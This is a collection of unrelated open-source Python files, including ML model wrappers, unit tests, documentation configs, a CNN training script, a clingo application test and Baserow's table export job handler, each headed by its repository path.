advancing = nansum(returns > 0, dim=1)
declining = nansum(returns < 0, dim=1)
ratio = (advancing / declining).unsqueeze(-1)
return ratio.repeat(1, returns.shape[1])
# ----------- Asset-specific data -----------
class AssetData(CustomFactor):
def __init__(self, asset, factor):
self.asset = asset
self.asset_ind = None
super().__init__(win=1, inputs=[factor])
def pre_compute_(self, engine, start, end):
super().pre_compute_(engine, start, end)
if not engine.align_by_time:
warnings.warn("Make sure your data is aligned by time, otherwise will cause data "
"disorder. Or set engine.align_by_time = True.",
RuntimeWarning)
self.asset_ind = engine.dataframe_index[1].unique().categories.get_loc(self.asset)
def compute(self, data):
ret = data[self.asset_ind]
return ret.repeat(data.shape[0], 1)
# ----------- Common Calendar Features -----------
MONTH = DatetimeDataFactor('month')
WEEKDAY = DatetimeDataFactor('weekday')
QUARTER = DatetimeDataFactor('quarter')
TIME = DatetimeDataFactor('hour') + DatetimeDataFactor('minute') / 60.0
IS_JANUARY = MONTH == 1
IS_DECEMBER = MONTH == 12
# Because the future data is used in IS_MONTH_END and IS_QUARTER_END factors, it will fail the
# test_lookahead_bias, but because it's != operation, so only a very low probability will fail the
# test. And this method is the fastest, so be it.
IS_MONTH_END = MONTH.shift(-1) != MONTH
IS_MONTH_START = MONTH.shift(1) != MONTH
IS_QUARTER_END = QUARTER.shift(-1) != QUARTER
IS_QUARTER_START = QUARTER.shift(1) != QUARTER
|
nginx-amplify-agent.py | dp92987/nginx-amplify-agent | 308 | 12717627 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import platform
__author__ = "<NAME>"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__credits__ = [] # check amplify/agent/main.py for the actual credits list
# Detect old Centos6 before we do anything else
distname, distversion, __ = platform.linux_distribution(full_distribution_name=False)
is_centos_6 = distname.lower() == 'centos' and distversion.split('.')[0] == '6'
is_redhat_6 = distname.lower() == 'redhat' and distversion.split('.')[0] == '6'
# Import amplify python package and add it's path to sys path
# This needs to be done in order to load all requirements from amplify python package
import amplify
amplify_path = '/'.join(amplify.__file__.split('/')[:-1])
sys.path.insert(0, amplify_path)
# Import gevent and make appropriate patches (depends on platform)
from gevent import monkey
if is_centos_6 or is_redhat_6:
monkey.patch_all(socket=False, ssl=False, select=False)
else:
monkey.patch_all()
# Run the main script
from amplify.agent import main
main.run('amplify')
|
test/test_workbook.py | rimishra-equinix/document-api-python | 263 | 12717669 | import unittest
import os.path
from tableaudocumentapi import Datasource, Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
EPHEMERAL_FIELD_FILE = os.path.join(
TEST_ASSET_DIR,
'ephemeral_field.twb'
)
SHAPES_FILE = os.path.join(
TEST_ASSET_DIR,
'shapes_test.twb'
)
DASHBOARDS_FILE = os.path.join(
TEST_ASSET_DIR,
'filtering.twb'
)
class EphemeralFields(unittest.TestCase):
def test_ephemeral_fields_do_not_cause_errors(self):
wb = Workbook(EPHEMERAL_FIELD_FILE)
self.assertIsNotNone(wb)
class Shapes(unittest.TestCase):
def test_shape_exist(self):
wb = Workbook(SHAPES_FILE)
self.assertEqual(wb.shapes, ['Bug Tracking/bug.png',
'Bug Tracking/icon-scheduleitem.png',
'Bug Tracking/light.png',
'Bug Tracking/mail.png',
]
)
def test_shape_count(self):
wb = Workbook(SHAPES_FILE)
self.assertEqual(len(wb.shapes), 4)
class Dashboards(unittest.TestCase):
def test_dashboards_setup(self):
wb = Workbook(DASHBOARDS_FILE)
self.assertIsNotNone(wb)
self.assertEqual(wb.dashboards, ['setTest'])
|
carla/models/api/mlmodel.py | jayanthyetukuri/CARLA | 140 | 12717670 | from abc import ABC, abstractmethod
from typing import Union
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.base import BaseEstimator
from carla.data.api import Data
class MLModel(ABC):
"""
Abstract class to implement custom black-box-model for a given dataset with encoding and scaling processing.
Parameters
----------
data: Data
Dataset inherited from Data-wrapper
scaling_method: str, default: MinMax
Type of used sklearn scaler. Can be set with property setter to any sklearn scaler.
encoding_method: str, default: OneHot
Type of OneHotEncoding [OneHot, OneHot_drop_binary]. Additional drop binary decides if one column
is dropped for binary features. Can be set with property setter to any sklearn encoder.
Methods
-------
predict:
One-dimensional prediction of ml model for an output interval of [0, 1].
predict_proba:
Two-dimensional probability prediction of ml model
Returns
-------
None
"""
def __init__(
self,
data: Data,
scaling_method: str = "MinMax",
encoding_method: str = "OneHot",
) -> None:
self.data: Data = data
if scaling_method == "MinMax":
fitted_scaler = preprocessing.MinMaxScaler().fit(data.raw[data.continous])
self.scaler: BaseEstimator = fitted_scaler
else:
raise NotImplementedError("Scaling Method not implemented")
if encoding_method == "OneHot":
fitted_encoder = preprocessing.OneHotEncoder(
handle_unknown="error", sparse=False
).fit(data.raw[data.categoricals])
elif encoding_method == "OneHot_drop_binary":
fitted_encoder = preprocessing.OneHotEncoder(
drop="if_binary", handle_unknown="error", sparse=False
).fit(data.raw[data.categoricals])
else:
raise ValueError("Encoding Method not known")
self.encoder: BaseEstimator = fitted_encoder
@property
def data(self) -> Data:
"""
Contains the data.api.Data dataset.
Returns
-------
carla.data.Data
"""
return self._data
@data.setter
def data(self, data: Data) -> None:
self._data = data
@property
def scaler(self) -> BaseEstimator:
"""
Contains a fitted sklearn scaler.
Returns
-------
sklearn.preprocessing.BaseEstimator
"""
return self._scaler
@scaler.setter
def scaler(self, scaler: BaseEstimator):
"""
Sets a new fitted sklearn scaler.
Parameters
----------
scaler : sklearn.preprocessing.Scaler
Fitted scaler for ML model.
Returns
-------
sklearn.preprocessing.BaseEstimator
"""
self._scaler = scaler
@property
def encoder(self) -> BaseEstimator:
"""
Contains a fitted sklearn encoder:
Returns
-------
sklearn.preprocessing.BaseEstimator
"""
return self._encoder
@encoder.setter
def encoder(self, encoder: BaseEstimator):
"""
Sets a new fitted sklearn encoder.
Parameters
----------
encoder: sklearn.preprocessing.Encoder
Fitted encoder for ML model.
"""
self._encoder = encoder
@property
@abstractmethod
def feature_input_order(self):
"""
Saves the required order of feature as list.
Prevents confusion about correct order of input features in evaluation
Returns
-------
list of str
"""
pass
@property
@abstractmethod
def backend(self):
"""
Describes the type of backend which is used for the classifier.
E.g., tensorflow, pytorch, sklearn, ...
Returns
-------
str
"""
pass
@property
@abstractmethod
def raw_model(self):
"""
Contains the raw ml model built on its framework
Returns
-------
object
Classifier, depending on used framework
"""
pass
@abstractmethod
def predict(self, x: Union[np.ndarray, pd.DataFrame]):
"""
One-dimensional prediction of ml model for an output interval of [0, 1].
Shape of input dimension has to be always two-dimensional (e.g., (1, m), (n, m))
Parameters
----------
x : np.Array or pd.DataFrame
Tabular data of shape N x M (N number of instances, M number of features)
Returns
-------
iterable object
Ml model prediction for interval [0, 1] with shape N x 1
"""
pass
@abstractmethod
def predict_proba(self, x: Union[np.ndarray, pd.DataFrame]):
"""
Two-dimensional probability prediction of ml model
Shape of input dimension has to be always two-dimensional (e.g., (1, m), (n, m))
Parameters
----------
x : np.Array or pd.DataFrame
Tabular data of shape N x M (N number of instances, M number of features)
Returns
-------
iterable object
Ml model prediction with shape N x 2
"""
pass
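# Illustrative sketch, not part of the CARLA source: a minimal concrete
# subclass wrapping an already-fitted sklearn classifier. It assumes the
# classifier exposes ``predict_proba`` and that ``data.continous`` and
# ``data.categoricals`` are plain lists of column names; a real integration
# should follow the CARLA documentation instead.
class SklearnModelSketch(MLModel):
    def __init__(self, data: Data, fitted_classifier) -> None:
        super().__init__(data)
        self._mymodel = fitted_classifier
    @property
    def feature_input_order(self):
        # Column order the wrapped classifier was trained on (assumed here).
        return self.data.continous + self.data.categoricals
    @property
    def backend(self):
        return "sklearn"
    @property
    def raw_model(self):
        return self._mymodel
    def predict(self, x):
        # Positive-class probability reshaped to N x 1.
        return self._mymodel.predict_proba(x)[:, 1].reshape(-1, 1)
    def predict_proba(self, x):
        # Full two-column probability output, shape N x 2.
        return self._mymodel.predict_proba(x)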
|
docs/conf.py | ChronicallySerious/Rootex | 166 | 12717721 | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Rootex'
copyright = 'MIT License, SDSLabs'
author = 'SDSLabs'
master_doc = 'index'
# -- Source information ------------------------------------------------------
source_parsers = {
}
source_suffix = ['.rst', '.md']
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autosectionlabel',
'recommonmark',
'breathe',
'exhale'
]
breathe_projects = {
"Rootex": "build/xml"
}
breathe_default_project = "Rootex"
exhale_args = {
# These arguments are required
"verboseBuild": True,
"containmentFolder": "api",
"rootFileName": "rootex.rst",
"rootFileTitle": "Rootex",
"doxygenStripFromPath": "../",
# Suggested optional arguments
"createTreeView": True,
# TIP: if using the sphinx-bootstrap-theme, you need
# "treeViewIsBootstrap": True,
"exhaleExecutesDoxygen": True,
"exhaleUseDoxyfile": True
}
primary_domain = 'cpp'
highlight_language = 'cpp'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
html_static_path = ['_static']
html_logo = '../rootex/assets/rootex.png'
html_favicon = '../rootex/assets/rootex.ico'
html_theme_options = {
'canonical_url': '',
'logo_only': False,
'display_version': True,
'prev_next_buttons_location': 'bottom',
'style_external_links': True,
'style_nav_header_background': '#22AA22',
# Toc options
'collapse_navigation': False,
'sticky_navigation': True,
'navigation_depth': -1,
'includehidden': True,
'titles_only': True
}
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
|
pqdm/__init__.py | dangercrow/pqdm | 129 | 12717733 | <reponame>dangercrow/pqdm
"""Top-level package for Parallel TQDM."""
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
|
adi_analyze/utils/JVMUtils_test.py | Bertlk/ADI | 226 | 12717756 | <filename>adi_analyze/utils/JVMUtils_test.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/3 8:38 PM
# @Author : kewen
# @File : JVMUtils_test.py
import unittest
from utils.JVMUtils import convertBaseType, convertObjectDesc, convertArray, convertClassDesc, convertMethodDesc
class Test(unittest.TestCase):
def test_convertBaseType(self):
self.assertEqual(convertBaseType("[[J"), "long[][]", "Parse failed!")
self.assertEqual(convertBaseType("Z"), "bool", "Parse failed!")
def test_convertObjectType(self):
self.assertEqual(convertObjectDesc("Landroid/content/Context;"), "android.content.Context")
self.assertEqual(convertObjectDesc("[[Landroid/content/Context;"), "android.content.Context[][]")
def test_convertArray(self):
self.assertEqual(convertArray("[[[J"), ("J", 3))
self.assertEqual(convertArray("Z"), ("Z", 0))
self.assertEqual(convertArray("[[[Landroid/content/Context;"), ("Landroid/content/Context;", 3))
def test_convertClassDesc(self):
self.assertEqual(convertClassDesc("[[[I"), "int[][][]")
self.assertEqual(convertClassDesc("Landroid/content/Context;"), "android.content.Context")
def test_convertMethodDesc(self):
self.assertEqual("(int)", convertMethodDesc("(I)V"))
self.assertEqual("(char[],int)", convertMethodDesc("([CI)[C"))
self.assertEqual("()", convertMethodDesc("()[C"))
self.assertEqual("(java.lang.Object,long)", convertMethodDesc("(Ljava/lang/Object;J)Ljava/lang/Runnable;"))
if __name__ == '__main__':
unittest.main()
|
owl/apps/mnist/mnist_cnn.py | jjzhang166/minerva | 561 | 12717761 | import sys
import time
import argparse
import numpy as np
import mnist_io
import owl
import owl.elewise as ele
import owl.conv as conv
lazy_cycle = 4
class MNISTCNNModel:
def __init__(self):
self.convs = [
conv.Convolver(0, 0, 1, 1),
conv.Convolver(2, 2, 1, 1),
];
self.poolings = [
conv.Pooler(2, 2, 2, 2, 0, 0, conv.pool_op.max),
conv.Pooler(3, 3, 3, 3, 0, 0, conv.pool_op.max)
];
def init_random(self):
self.weights = [
owl.randn([5, 5, 1, 16], 0.0, 0.1),
owl.randn([5, 5, 16, 32], 0.0, 0.1),
owl.randn([10, 512], 0.0, 0.1)
];
self.weightdelta = [
owl.zeros([5, 5, 1, 16]),
owl.zeros([5, 5, 16, 32]),
owl.zeros([10, 512])
];
self.bias = [
owl.zeros([16]),
owl.zeros([32]),
owl.zeros([10, 1])
];
self.biasdelta = [
owl.zeros([16]),
owl.zeros([32]),
owl.zeros([10, 1])
];
def print_training_accuracy(o, t, mbsize, prefix):
predict = o.reshape([10, mbsize]).max_index(0)
ground_truth = t.reshape([10, mbsize]).max_index(0)
correct = (predict - ground_truth).count_zero()
print prefix, 'error: {}'.format((mbsize - correct) * 1.0 / mbsize)
def bpprop(model, samples, label):
num_layers = 6
num_samples = samples.shape[-1]
fc_shape = [512, num_samples]
acts = [None] * num_layers
errs = [None] * num_layers
weightgrad = [None] * len(model.weights)
biasgrad = [None] * len(model.bias)
acts[0] = samples
acts[1] = ele.relu(model.convs[0].ff(acts[0], model.weights[0], model.bias[0]))
acts[2] = model.poolings[0].ff(acts[1])
acts[3] = ele.relu(model.convs[1].ff(acts[2], model.weights[1], model.bias[1]))
acts[4] = model.poolings[1].ff(acts[3])
acts[5] = model.weights[2] * acts[4].reshape(fc_shape) + model.bias[2]
out = conv.softmax(acts[5], conv.soft_op.instance)
errs[5] = out - label
errs[4] = (model.weights[2].trans() * errs[5]).reshape(acts[4].shape)
errs[3] = ele.relu_back(model.poolings[1].bp(errs[4], acts[4], acts[3]), acts[3])
errs[2] = model.convs[1].bp(errs[3], acts[2], model.weights[1])
errs[1] = ele.relu_back(model.poolings[0].bp(errs[2], acts[2], acts[1]), acts[1])
weightgrad[2] = errs[5] * acts[4].reshape(fc_shape).trans()
biasgrad[2] = errs[5].sum(1)
weightgrad[1] = model.convs[1].weight_grad(errs[3], acts[2], model.weights[1])
biasgrad[1] = model.convs[1].bias_grad(errs[3])
weightgrad[0] = model.convs[0].weight_grad(errs[1], acts[0], model.weights[0])
biasgrad[0] = model.convs[0].bias_grad(errs[1])
return (out, weightgrad, biasgrad)
def train_network(model, num_epochs=100, minibatch_size=256, lr=0.01, mom=0.75, wd=5e-4):
# load data
(train_data, test_data) = mnist_io.load_mb_from_mat('mnist_all.mat', minibatch_size / len(gpu))
num_test_samples = test_data[0].shape[0]
test_samples = owl.from_numpy(test_data[0]).reshape([28, 28, 1, num_test_samples])
test_labels = owl.from_numpy(test_data[1])
for i in xrange(num_epochs):
print "---Epoch #", i
last = time.time()
count = 0
weightgrads = [None] * len(gpu)
biasgrads = [None] * len(gpu)
for (mb_samples, mb_labels) in train_data:
count += 1
current_gpu = count % len(gpu)
owl.set_device(gpu[current_gpu])
num_samples = mb_samples.shape[0]
data = owl.from_numpy(mb_samples).reshape([28, 28, 1, num_samples])
label = owl.from_numpy(mb_labels)
out, weightgrads[current_gpu], biasgrads[current_gpu] = bpprop(model, data, label)
if current_gpu == 0:
for k in range(len(model.weights)):
model.weightdelta[k] = mom * model.weightdelta[k] - lr / num_samples / len(gpu) * multi_gpu_merge(weightgrads, 0, k) - lr * wd * model.weights[k]
model.biasdelta[k] = mom * model.biasdelta[k] - lr / num_samples / len(gpu) * multi_gpu_merge(biasgrads, 0, k)
model.weights[k] += model.weightdelta[k]
model.bias[k] += model.biasdelta[k]
if count % (len(gpu) * lazy_cycle) == 0:
print_training_accuracy(out, label, num_samples, 'Training')
print '---End of Epoch #', i, 'time:', time.time() - last
# do test
out, _, _ = bpprop(model, test_samples, test_labels)
print_training_accuracy(out, test_labels, num_test_samples, 'Testing')
def multi_gpu_merge(l, base, layer):
if len(l) == 1:
return l[0][layer]
left = multi_gpu_merge(l[:len(l) / 2], base, layer)
right = multi_gpu_merge(l[len(l) / 2:], base + len(l) / 2, layer)
owl.set_device(base)
return left + right
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='MNIST CNN')
parser.add_argument('-n', '--num', help='number of GPUs to use', action='store', type=int, default=1)
(args, remain) = parser.parse_known_args()
assert(1 <= args.num)
print 'Using %d GPU(s)' % args.num
gpu = [owl.create_gpu_device(i) for i in range(args.num)]
owl.set_device(gpu[0])
model = MNISTCNNModel()
model.init_random()
train_network(model)
|
mayan/apps/documents/tests/test_copying.py | nattangwiwat/Mayan-EDMS-recitation | 343 | 12717762 | from mayan.apps.common.tests.mixins import ObjectCopyTestMixin
from mayan.apps.testing.tests.base import BaseTestCase
from .mixins.document_mixins import DocumentTestMixin
class DocumentTypeCopyTestCase(
DocumentTestMixin, ObjectCopyTestMixin, BaseTestCase
):
auto_upload_test_document = False
def setUp(self):
super().setUp()
self.test_object = self.test_document_type
|
flow-python/megflow/func_op.py | MegEngine/MegFlow | 303 | 12717766 | #!/usr/bin/env python
# coding=utf-8
from .registry import register
import inspect
from functools import partial
import re
class Context:
def __init__(self, **entries):
self.__dict__.update(entries)
def name_convert_to_camel(name):
contents = re.findall('_[a-z]+', name)
for content in set(contents):
name = name.replace(content, content[1:].title())
return name.title()
def _with_context(func):
sig = inspect.signature(func)
params = sig.parameters
return 'context' in params
def _common_def(inputs=[], outputs=[]):
def common_def(plugin_def):
def decorator(name=None, exclusive=False):
def _decorator(func):
nonlocal name
if name is None:
name = func.__name__
name = name_convert_to_camel(name)
with_context = _with_context(func)
@register(name=name, inputs=inputs, outputs=outputs, exclusive=exclusive)
class Node:
def __init__(self, name, args):
self.context = Context(**args)
self.name = name
if with_context:
self.impl = partial(func, context = self.context)
else:
self.impl = func
def exec(self):
plugin_def(self, self.impl)
return Node
return _decorator
return decorator
return common_def
@_common_def(inputs=["inp"], outputs=["out"])
def map_def(self, func):
envelope = self.inp.recv()
if envelope is None:
return
envelope.msg = func(envelope.msg)
self.out.send(envelope)
@_common_def(inputs=["inp:[]"], outputs=["out"])
def reduce_def(self, func):
ret = []
for inp in self.inp:
ret.append(inp.recv())
all_empty = True
for envelope in ret:
all_empty = all_empty and envelope is None
if all_empty:
return
for envelope in ret:
assert envelope is not None
msgs = [ envelope.msg for envelope in ret ]
self.out.send(ret[0].repack(func(msgs)))
@_common_def(inputs=["inp"])
def sink_def(self, func):
envelope = self.inp.recv()
if envelope is None:
return
func(envelope.msg)
@_common_def(outputs=["out"])
def source_def(self, func):
from megflow import Envelope
i = 0
for msg in func():
self.out.send(Envelope.pack(msg, info={'partial_id':i}))
i += 1
@_common_def(inputs=["inp"], outputs=["out"])
def batch_def(self, func):
(envelopes, is_closed) = self.inp.batch_recv(self.context.batch_size, self.context.timeout)
if len(envelopes) == 0:
return
func([envelope.msg for envelope in envelopes])
for envelope in envelopes:
self.out.send(envelope)
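# Illustrative usage sketch, not part of the original module: applying the
# map_def decorator above registers a graph node (under the CamelCase name
# produced by name_convert_to_camel) whose exec() pulls an envelope from
# "inp", applies the function to envelope.msg, and forwards it to "out".
# The 'value' message key is an assumption made only for this example.
@map_def(exclusive=False)
def double_value(msg):
    msg['value'] = msg.get('value', 0) * 2
    return msg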
|
Megatron-LM/scripts/presplit_sentences_json.py | weilianglin101/DeepSpeedExamples | 309 | 12717794 | """
Usage:
python scripts/presplit_sentences_json.py <original loose json file> <output loose json file>
"""
import sys
import json
import nltk
nltk.download('punkt')
input_file = sys.argv[1]
output_file = sys.argv[2]
line_seperator = "\n"
with open(input_file, 'r') as ifile:
with open(output_file, "w") as ofile:
for doc in ifile.readlines():
parsed = json.loads(doc)
sent_list = []
for line in parsed['text'].split('\n'):
if line != '\n':
sent_list.extend(nltk.tokenize.sent_tokenize(line))
parsed['text'] = line_seperator.join(sent_list)
ofile.write(json.dumps(parsed)+'\n')
|
src/python/tensorflow_cloud/utils/tf_utils.py | haifeng-jin/cloud | 342 | 12717795 | <filename>src/python/tensorflow_cloud/utils/tf_utils.py
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TensorFlow utilities."""
from typing import Text
import tensorflow as tf
from tensorboard.backend.event_processing import directory_watcher
from tensorboard.backend.event_processing import event_file_loader
from tensorboard.backend.event_processing import io_wrapper
def get_version():
return tf.__version__
def get_tensorboard_log_watcher_from_path(
path: Text):
"""Create an event generator for file or directory at given path string.
This method creates an event generator using tensorboard directory_watcher.
The generator.load() method will return event logs as they become available.
The generator does not repeat events.
Args:
path: Text representing a directory, file, or Google Cloud Storage
(GCS) path for tensorboard logs.
Returns:
A tensorboard directory_watcher event generator.
Raises:
ValueError: if path is not defined.
"""
if not path:
raise ValueError("path must be a valid string")
if io_wrapper.IsSummaryEventsFile(path):
return event_file_loader.EventFileLoader(path)
return directory_watcher.DirectoryWatcher(
path,
event_file_loader.EventFileLoader,
io_wrapper.IsSummaryEventsFile,
)
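# Illustrative usage sketch, not part of the original module: poll a log
# directory and print events as they appear. The path is a placeholder, and
# ``Load()`` is the generator method exposed by the tensorboard
# directory_watcher/event_file_loader objects returned above.
if __name__ == "__main__":
    watcher = get_tensorboard_log_watcher_from_path("/tmp/tensorboard_logs")
    for tb_event in watcher.Load():
        print(tb_event)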
|
moldesign/models/__init__.py | Autodesk/molecular-design-toolkit | 147 | 12717846 | <reponame>Autodesk/molecular-design-toolkit
from .openmm import *
from .pyscf import *
from .models import *
from .toys import *
from .amber import *
from .openbabel import *
from .nwchem import *
from .qmmm import *
|
sofi/ui/fontawesomeicon.py | screamingskulls/sofi | 402 | 12717852 | <gh_stars>100-1000
from .element import Element
class FontAwesomeIcon(Element):
"""Implements a Font Awesome Icons"""
def __init__(self, name=None, size=None, fixed=False, animation=None,
rotate=None, flip=None, border=False, pull=None,
cl=None, ident=None, style=None, attrs=None):
super().__init__(cl=cl, ident=ident, style=style, attrs=attrs)
self.name = name
self.size = size
self.fixed = fixed
self.animation = animation
self.rotate = rotate
self.flip = flip
self.border = border
self.pull = pull
def __repr__(self):
return "<Icon(name='" + self.name + "')>"
def __str__(self):
output = [ "<i" ]
if self.ident:
output.append(" id=\"")
output.append(self.ident)
output.append("\"")
classes = ["fa"]
if self.name:
classes.append("fa-" + self.name)
if self.animation:
classes.append("fa-" + self.animation)
if self.rotate:
classes.append("fa-rotate-" + self.rotate)
if self.border:
classes.append("fa-border")
if self.pull:
classes.append("fa-pull-" + self.pull)
if self.flip:
classes.append("fa-flip-" + self.flip)
if self.size:
classes.append("fa-" + self.size)
if self.fixed:
classes.append("fa-fw")
if self.cl:
classes.append(self.cl)
if len(classes) > 0:
output.append(' class="')
output.append(" ".join(classes))
output.append('"')
if self.style:
output.append(" style=\"")
output.append(self.style)
output.append("\"")
if self.attrs:
for k in self.attrs.keys():
output.append(' ' + k + '="' + self.attrs[k] + '"')
output.append(">")
for child in self._children:
output.append(str(child))
output.append("</i>")
return "".join(output)
|
libpyclingo/clingo/tests/test_application.py | potassco/gringo | 423 | 12717875 | '''
Test clingo's Application class.
'''
from typing import Any, Callable, List, Sequence, Tuple
from unittest import TestCase
from tempfile import NamedTemporaryFile
from multiprocessing import Process, Queue
import os
import re
from .util import _MCB
from ..core import MessageCode
from ..application import Application, ApplicationOptions, Flag, clingo_main
class TestApp(Application):
'''
Test application covering most of the Application related API.
Note that I did not find a nice way to test model printing.
'''
_queue: Queue
program_name = 'test'
version = '1.2.3'
message_limit = 17
def __init__(self, queue: Queue):
self._queue = queue
self._flag = Flag()
def _parse_test(self, value):
self._queue.put(('parse', value))
return True
def register_options(self, options: ApplicationOptions) -> None:
self._queue.put('register')
group = 'Clingo.Test'
options.add(group, 'test', 'test description', self._parse_test)
options.add_flag(group, 'flag', 'test description', self._flag)
def validate_options(self) -> bool:
self._queue.put('validate')
self._queue.put(('flag', self._flag.flag))
return True
def logger(self, code: MessageCode, message: str) -> None:
self._queue.put((code, re.sub('^.*:(?=[0-9]+:)', '', message)))
def main(self, control, files):
self._queue.put('main')
for file_ in files:
control.load(file_)
control.ground([("base", [])])
mcb = _MCB()
control.solve(on_model=mcb.on_model)
self._queue.put(('models', [ [ str(sym) for sym in model ] for model in mcb.models ]))
def _run_process(app: Callable[[Queue], Application], program: str, queue: Queue, args: Sequence[str]) -> None:
'''
Run clingo application with given program and intercept results.
'''
with NamedTemporaryFile(mode='wt', delete=False) as fp:
name = fp.name
fp.write(program)
try:
# Note: The multiprocess module does not allow for intercepting the
# output. Thus, the output is simply disabled and we use the Queue
# class to communicate results.
ret = clingo_main(app(queue), (name, '--outf=3') + tuple(args))
queue.put(int(ret))
queue.close()
finally:
os.unlink(name)
AppResult = Tuple[int, List[Any]]
def run_app(app: Callable[[Queue], Application], program: str, *args: Sequence[str]) -> AppResult:
'''
Run clingo application in subprocess via multiprocessing module.
'''
q: Queue
q = Queue()
p = Process(target=_run_process, args=(app, program, q, tuple(args)))
p.start()
seq: List[Any]
seq, ret = [], -1
while True:
ret = q.get()
if isinstance(ret, int):
status = ret
break
seq.append(ret)
p.join()
q.close()
return status, seq
class TestApplication(TestCase):
'''
Tests for clingo's application class.
'''
def test_app(self):
'''
Test application.
'''
ret, seq = run_app(TestApp, "1 {a; b; c(1/0)}.", "0", '--test=x', '--flag')
self.assertEqual(ret, 30)
self.assertEqual(seq, [
'register',
('parse', 'x'),
'validate',
('flag', True),
'main',
(MessageCode.OperationUndefined, '1:12-15: info: operation undefined:\n (1/0)\n'),
('models', [['a'], ['a', 'b'], ['b']])])
|
dashboard/app/rules/conditions/email.py | robertsimmons514/isthislegit | 282 | 12717891 | from app.rules import Condition
import re
class EmailCondition(Condition):
    ''' EmailCondition matches an attribute of the EmailReport.
    This is done by a simple regex.'''
    def match(self, report, field, value):
        # Sketch of the documented behaviour: treat ``value`` as a regex and
        # test it against the named report attribute (the getattr lookup and
        # the added ``self`` parameter are assumptions about the framework).
        attribute = getattr(report, field, None)
        return attribute is not None and re.search(value, str(attribute)) is not None
|
backend/src/baserow/contrib/database/export/handler.py | cjh0613/baserow | 839 | 12717976 | import logging
import uuid
from io import BytesIO
from os.path import join
from typing import Optional, Dict, Any, BinaryIO
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.files.storage import default_storage
from django.db import transaction
from django.utils import timezone
from baserow.contrib.database.export.models import (
ExportJob,
EXPORT_JOB_CANCELLED_STATUS,
EXPORT_JOB_PENDING_STATUS,
EXPORT_JOB_FAILED_STATUS,
EXPORT_JOB_EXPIRED_STATUS,
EXPORT_JOB_COMPLETED_STATUS,
EXPORT_JOB_EXPORTING_STATUS,
)
from baserow.contrib.database.export.tasks import run_export_job
from baserow.contrib.database.table.models import Table
from baserow.contrib.database.views.models import View
from baserow.contrib.database.views.exceptions import ViewNotInTable
from baserow.contrib.database.views.registries import view_type_registry
from .exceptions import (
TableOnlyExportUnsupported,
ViewUnsupportedForExporterType,
ExportJobCanceledException,
)
from .file_writer import PaginatedExportJobFileWriter
from .registries import table_exporter_registry, TableExporter
logger = logging.getLogger(__name__)
User = get_user_model()
class ExportHandler:
@staticmethod
def create_and_start_new_job(
user: User, table: Table, view: Optional[View], export_options: Dict[str, Any]
) -> ExportJob:
"""
For the provided user, table, optional view and options will create a new
export job and start an asynchronous celery task which will perform the
export and update the job with any results.
:param user: The user who the export job is being run for.
:param table: The table on which the job is being run.
:param view: An optional view of the table to export instead of the table
itself.
:param export_options: A dict containing exporter_type and the relevant options
for that type.
:return: The created export job.
"""
job = ExportHandler.create_pending_export_job(user, table, view, export_options)
# Ensure we only trigger the job after the transaction we are in has committed
# and created the export job in the database. Otherwise the job might run before
# we commit and crash as there is no job yet.
transaction.on_commit(lambda: run_export_job.delay(job.id))
return job
@staticmethod
def create_pending_export_job(
user: User, table: Table, view: Optional[View], export_options: Dict[str, Any]
):
"""
        Creates a new pending export job configured with the provided options but does
not start the job. Will cancel any previously running jobs for this user. Raises
exceptions if the user is not allowed to create an export job for the view/table
due to missing permissions or if the selected exporter doesn't support the
view/table.
:param user: The user who the export job is being run for.
:param table: The table on which the job is being run.
:param view: An optional view of the table to export instead of the table
itself.
:param export_options: A dict containing exporter_type and the relevant options
for that type.
:raises ViewNotInTable: If the view does not belong to the table.
:return: The created export job.
"""
table.database.group.has_user(user, raise_error=True)
if view and view.table.id != table.id:
raise ViewNotInTable()
_cancel_unfinished_jobs(user)
exporter_type = export_options.pop("exporter_type")
_raise_if_invalid_view_or_table_for_exporter(exporter_type, view)
job = ExportJob.objects.create(
user=user,
table=table,
view=view,
exporter_type=exporter_type,
status=EXPORT_JOB_PENDING_STATUS,
export_options=export_options,
)
return job
@staticmethod
def run_export_job(job) -> ExportJob:
"""
Given an export job will run the export and store the result in the configured
storage. Internally it does this in a paginated way to ensure constant memory
usage, meaning any size export job can be run as long as you have enough time.
If the export job fails will store the failure on the job itself and mark the
job as failed.
:param job: The job to run.
:return: An updated ExportJob instance with the exported file name.
"""
# Ensure the user still has permissions when the export job runs.
job.table.database.group.has_user(job.user, raise_error=True)
try:
return _mark_job_as_finished(_open_file_and_run_export(job))
except ExportJobCanceledException:
# If the job was canceled then it must not be marked as failed.
pass
except Exception as e:
_mark_job_as_failed(job, e)
raise e
@staticmethod
